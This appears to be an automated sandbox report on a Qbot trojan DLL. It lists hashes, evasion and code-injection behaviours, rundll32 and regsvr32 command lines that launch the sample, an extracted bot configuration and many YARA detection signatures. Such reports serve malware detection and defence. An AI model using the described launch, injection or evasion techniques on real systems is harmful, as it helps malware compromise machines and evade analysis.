Windows Analysis Report
_Rsr.dll

Overview

General Information

Sample Name: _Rsr.dll
Analysis ID: 701477
MD5: 416a95274ef9248e08d88d5e2abe6971
SHA1: 03ac095d3a7bedad7b5c4aa1ea02c77be9fa86cb
SHA256: fce49100872fb07dea83d417a95574304dcfdfc835034739af1a50a752b8594a
Tags: dll
Infos:

Detection

Qbot
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Registers a DLL
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4444 cmdline: loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4684 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5620 cmdline: rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • explorer.exe (PID: 5784 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • regsvr32.exe (PID: 5832 cmdline: regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 4892 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • rundll32.exe (PID: 1652 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 1176 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 1756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5772 cmdline: rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • explorer.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • cleanup
{"Bot id": "BB", "Campaign": "1662992461", "Version": "403.868"}
Source, Rule, Description, Author, Strings
00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, JoeSecurity_Qbot_1, Yara detected Qbot, Joe Security
    00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Windows_Trojan_Qbot_92c67a6d, unknown, unknown
    • 0xd7f4:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Windows_Trojan_Qbot_3074a8d4, unknown, unknown
    • 0x18e9c:$a4: %u;%u;%u;
    • 0x193d8:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x19260:$a6: %u&%s&%u
    • 0x54f5:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x5833:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
    • 0x9187:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, JoeSecurity_Qbot_1, Yara detected Qbot, Joe Security
      00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Windows_Trojan_Qbot_92c67a6d, unknown, unknown
      • 0xe3b4:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Source, Rule, Description, Author, Strings
      3.2.rundll32.exe.3100000.0.raw.unpack, JoeSecurity_Qbot_1, Yara detected Qbot, Joe Security
        3.2.rundll32.exe.3100000.0.raw.unpack, Windows_Trojan_Qbot_92c67a6d, unknown, unknown
        • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        3.2.rundll32.exe.3100000.0.raw.unpack, Windows_Trojan_Qbot_3074a8d4, unknown, unknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
        • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
        • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        2.3.regsvr32.exe.2cce488.0.unpack, JoeSecurity_Qbot_1, Yara detected Qbot, Joe Security
          2.3.regsvr32.exe.2cce488.0.unpack, Windows_Trojan_Qbot_92c67a6d, unknown, unknown
          • 0xf76c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: _Rsr.dll, Joe Sandbox ML: detected
          Source: 0.2.loaddll32.exe.a20000.0.unpack, Malware Configuration Extractor: Qbot {"Bot id": "BB", "Campaign": "1662992461", "Version": "403.868"}
          Source: _Rsr.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: Binary string: amstream.pdb source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6D50D074 FindFirstFileExA,0_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_027AC134 FindFirstFileW,FindNextFileW,2_2_027AC134
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_6D50D074 FindFirstFileExA,2_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_027A5CC4 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,2_2_027A5CC4
          Source: loaddll32.exe, 00000000.00000002.396414713.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          System Summary

          Source: _Rsr.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
